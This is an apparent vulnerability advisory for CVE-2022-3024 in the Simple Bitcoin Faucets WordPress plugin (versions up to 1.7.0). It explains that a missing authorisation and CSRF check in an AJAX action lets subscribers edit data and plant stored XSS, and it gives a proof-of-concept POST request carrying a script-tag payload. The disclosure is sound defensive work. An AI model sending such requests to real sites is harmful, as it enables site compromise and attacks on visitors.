Simple Bitcoin Faucets by Alexey Trofimov

Simple Bitcoin Faucets by Alexey Trofimov <= 1.7.0 - Unauthorised AJAX request to Stored XSS

LANACOMMONVDB ID: 6094f9ae-722b-4a1a-8c5d-2da16d22700f

The plugin does not have any authorisation and Cross-Site Request Forgery (CSRF) check in an AJAX action, allowing any authenticated users, such as subscribers to call it and add/delete/edit Bonds. Furthermore, due to the lack of sanitisation and escaping, it could also lead to Stored Cross-Site Scripting (XSS) issues.

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded

option=SBF_DB_code_manage_action&B_COMMAND=ADD&B_PARAM=10&B_PARAM2=<script>alert(/XSS/)</script>&B_PARAM3=1&submit=submit

References

Source Code: https://wordpress.org/plugins/simple-bitcoin-faucets/

CVE: CVE-2022-3024

Attributes

Catgory: WordPress Plugin

Discovered: 2022-08-27

Published: 2022-08-31

Affected Version: <= 1.7.0

Classification

Type: Broken Access Control, Cross-Site Request Forgery (CSRF), Cross-Site Scripting (XSS)

Researcher

Name: István Márton

Email: [email protected]